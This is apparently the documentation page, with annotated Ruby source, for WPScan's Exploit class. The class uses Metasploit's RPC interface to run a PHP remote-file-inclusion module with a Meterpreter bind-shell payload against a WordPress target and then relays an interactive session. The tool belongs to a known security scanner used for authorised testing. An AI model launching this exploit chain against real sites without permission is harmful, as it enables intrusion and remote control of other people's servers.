Exploit

This library should contain all methods for exploitation.

Attributes

postdata[RW]
rhost[RW]
type[RW]
uri[RW]

Public Class Methods

new(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port) click to toggle source
# File lib/wpscan/exploit.rb, line 27
# Build an exploit context for +wp_url+ and immediately call +start+, so
# constructing an instance may prompt the operator on the terminal (see start).
#
# wp_url   - target WordPress URL (String or URI); only its host and path are
#            kept as @rhost / @path. URI.parse of a bare "example.com" yields no
#            host, so @rhost would be nil in that case — pass a full URL.
# type     - vulnerability class; "RFI" is the only value start acts on.
# uri      - vulnerable URI, handed to the RPC server as PHPURI by exploit.
# postdata - POST body, "" when there is none.
# use_proxy, proxy_addr, proxy_port - stored in instance variables but not read
#            by any method shown on this page.
def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)
  parsed = URI.parse(wp_url.to_s)
  @wp_url = parsed
  @rhost, @path = parsed.host, parsed.path
  @type, @uri, @postdata = type, uri, postdata
  # Set once a session has been selected by choose_session.
  @session_in_use = nil
  @use_proxy, @proxy_addr, @proxy_port = use_proxy, proxy_addr, proxy_port
  start
end

Public Instance Methods

choose_session() click to toggle source

If there is more than one session, let the user choose one by id.

# File lib/wpscan/exploit.rb, line 148
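# Select the session the interactive loop will talk to and store it in
# @session_in_use.
#
# With two or more sessions the operator is asked for an id. The answer is
# checked against the ids actually returned by +sessions+: an unknown id falls
# back to the most recent session instead of being stored verbatim, so later
# RPC calls (kill_session, meterpreter_read/write) never receive an id that
# does not exist. The stored value is the session key itself, matching what
# last_session_id returns, rather than the raw typed string.
# With fewer than two sessions the most recent one is used without prompting.
def choose_session()
  active = sessions
  if active.size >= 2
    puts "[?] We have " + active.size.to_s + " sessions running. Please choose one by id."
    puts active.keys.map { |id| id.to_s }.join(" ")
    # Readline.readline returns nil on EOF; to_s keeps the comparison safe.
    answer = Readline.readline.to_s.strip
    chosen = active.keys.find { |id| id.to_s == answer }
    if chosen.nil?
      puts "[ERROR] Unknown session id " + answer + "; using session " + last_session_id().to_s
      @session_in_use = last_session_id()
    else
      puts "Using session " + chosen.to_s
      @session_in_use = chosen
    end
  else
    puts "Using session " + last_session_id().to_s
    @session_in_use = last_session_id()
  end
end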
exploit(msf_module, payload) click to toggle source

exploit

# File lib/wpscan/exploit.rb, line 61
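# Run +msf_module+ with +payload+ against the configured target through the
# RPC client, wait for a session to appear, then relay an interactive
# read/write loop between the terminal and the selected session.
#
# Returns false when the RPC call does not report "success", when no session
# appears within 60 seconds, or when the operator types "exit" (or closes
# stdin); the interactive loop has no other way out.
def exploit(msf_module, payload)
  exploit_info(msf_module, payload)

  options = { :RHOST => @rhost, :PATH => @path, :PHPURI => @uri, :PAYLOAD => payload }
  # POSTDATA is only sent when the caller supplied one.
  options[:POSTDATA] = @postdata unless @postdata == ""
  result = RpcClient.new.exploit(msf_module, options)

  unless result['result'] == "success"
    puts "[ERROR] Exploit failed! :("
    return false
  end

  puts "[*] Exploit worked! Waiting for a session..."
  # Poll once per second instead of spinning: each +sessions+ call is a
  # round trip to the RPC server, and the original loop issued two per
  # iteration with no pause.
  session_spawn_timer = Time.now
  loop do
    current = sessions
    break unless current.nil? || current.empty?
    if Time.now - session_spawn_timer > 60
      puts "[ERROR] Session was not created... exiting."
      return false
    end
    sleep 1
  end

  # choose_session sets @session_in_use; the loop below must use that same id
  # for reading and writing, otherwise the operator could be talking to one
  # session and killing another.
  choose_session()

  loop do
    puts meterpreter_read(@session_in_use)
    input = Readline.readline
    # nil means EOF on stdin; treat it like "exit" rather than encoding nil.
    if input.nil? || input == "exit"
      kill_session(@session_in_use)
      return false
    end
    meterpreter_write(@session_in_use, input)
  end
end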
exploit_info(msf_module,payload) click to toggle source

output our exploit data

# File lib/wpscan/exploit.rb, line 105
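# Print the module's name and description (fetched from the RPC server) and
# the option values that exploit will send, in a "| "-prefixed block.
#
# The description is reflowed so every line carries the "| " prefix. The
# original used chained gsub!/chop!, which return nil when nothing was
# substituted — any description without a tab raised NoMethodError, and a
# description without a trailing newline lost its last character.
def exploit_info(msf_module, payload)
  info = RpcClient.new.get_exploit_info(msf_module)
  description = info['description'].to_s
    .gsub("\t", "")
    .gsub("\n\n", "\n")
    .strip
    .gsub("\n", "\n| ")
  puts
  puts "| [EXPLOIT]"
  puts "| Name: " + info['name'].to_s
  puts "| Description: " + description
  puts "| [OPTIONS]"
  # to_s: @rhost/@path are nil when the URL given to new had no host.
  puts "| RHOST: " + @rhost.to_s
  puts "| PATH: " + @path.to_s
  puts "| URI: " + @uri.to_s
  puts "| POSTDATA: " + @postdata.to_s if @postdata != ""
  puts "| Payload: " + payload.to_s
  puts
end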
job_id() click to toggle source

not sure if this is needed?! not used.

# File lib/wpscan/exploit.rb, line 122
# Print the job list returned by the RPC server. Returns nil (the value of
# puts); nothing on this page calls it.
def job_id
  puts RpcClient.new.jobs
end
kill_session(id) click to toggle source

kill a session by session id

# File lib/wpscan/exploit.rb, line 167
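# Ask the RPC server to kill session +id+.
#
# Returns true when the server reports "success", false otherwise. Any
# StandardError raised by the RPC call is reported as a missing session;
# that covers transport errors too, so the message may be misleading when the
# server itself is unreachable. (The original returned nil on success.)
def kill_session(id)
  killed = RpcClient.new.kill_session(id)
  if killed['result'] == "success"
    puts "[-] Session " + id.to_s + " killed."
    return true
  end
  false
rescue StandardError
  puts "[] Session " + id.to_s + " does not exist."
  false
end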
last_session_id() click to toggle source

the last active session id created

# File lib/wpscan/exploit.rb, line 135
# Id of the last session in the list returned by +sessions+, or nil when
# there are none. "Last created" relies on the RPC server returning sessions
# in creation order — not verified here.
def last_session_id
  ids = sessions.keys
  ids[-1]
end
meterpreter_read(id) click to toggle source

Read data from a meterpreter session; the data is returned base64 encoded and must be decoded.

# File lib/wpscan/exploit.rb, line 196
# Read pending output from meterpreter session +id+. The RPC response carries
# the bytes base64 encoded under 'data'; the decoded string is returned.
def meterpreter_read(id)
  response = RpcClient.new.meterpreter_read(id)
  Base64.decode64(response['data'])
end
meterpreter_write(id, data) click to toggle source

Write data to a meterpreter session; the data must be base64 encoded before it is sent.

# File lib/wpscan/exploit.rb, line 203
# Send +data+ to meterpreter session +id+, base64 encoded as the RPC call
# expects. Returns whatever the RPC client returns.
def meterpreter_write(id, data)
  encoded = Base64.encode64(data)
  RpcClient.new.meterpreter_write(id, encoded)
end
read_shell(id) click to toggle source

Read data from a shell session; a meterpreter session is not classed as a shell.

# File lib/wpscan/exploit.rb, line 182
# Read pending output from shell session +id+; returns the 'data' field of the
# RPC response as-is (no decoding, unlike meterpreter_read).
def read_shell(id)
  response = RpcClient.new.read_shell(id)
  response['data']
end
session_count() click to toggle source

The number of active sessions.

# File lib/wpscan/exploit.rb, line 141
# Number of sessions currently reported by the RPC server. Each call fetches
# the session list again.
def session_count
  sessions.length
end
sessions() click to toggle source

all sessions and related session data

# File lib/wpscan/exploit.rb, line 129
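# Fetch the current session list from the RPC server.
#
# Returns whatever RpcClient#sessions returns; the rest of this class treats
# it as a Hash keyed by session id (it calls keys, size and empty? on it).
# The original assigned the result to an unused local of the same name.
def sessions
  RpcClient.new.sessions
end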
start() click to toggle source

figure out what to exploit

# File lib/wpscan/exploit.rb, line 43
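# Decide what to do for the configured @type. Called from initialize, so this
# can prompt on the terminal during construction.
#
# "RFI": ask for confirmation and, on a "y…" answer, run the hard-coded module
#        and payload through exploit (returning its result); otherwise false.
# "SQLI": not implemented — the branch was empty in the original, so it
#        returns nil, as does any other type.
def start
  case @type
  when "RFI"
    puts
    puts "[?] Exploit? [y/n]"
    answer = Readline.readline
    # start_with? replaces /^y/: ^ matches at the start of any line, and
    # Readline returns nil on EOF, which to_s turns into "no".
    return false unless answer.to_s.start_with?("y")
    exploit("exploit/unix/webapp/php_include", "php/meterpreter/bind_tcp")
  when "SQLI"
    nil
  end
end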
write_shell(id, data) click to toggle source

Write data to a shell session; a meterpreter session is not classed as a shell.

# File lib/wpscan/exploit.rb, line 189
# Send +data+ to shell session +id+ unchanged (no encoding, unlike
# meterpreter_write). Returns whatever the RPC client returns.
def write_shell(id, data)
  client = RpcClient.new
  client.write_shell(id, data)
end
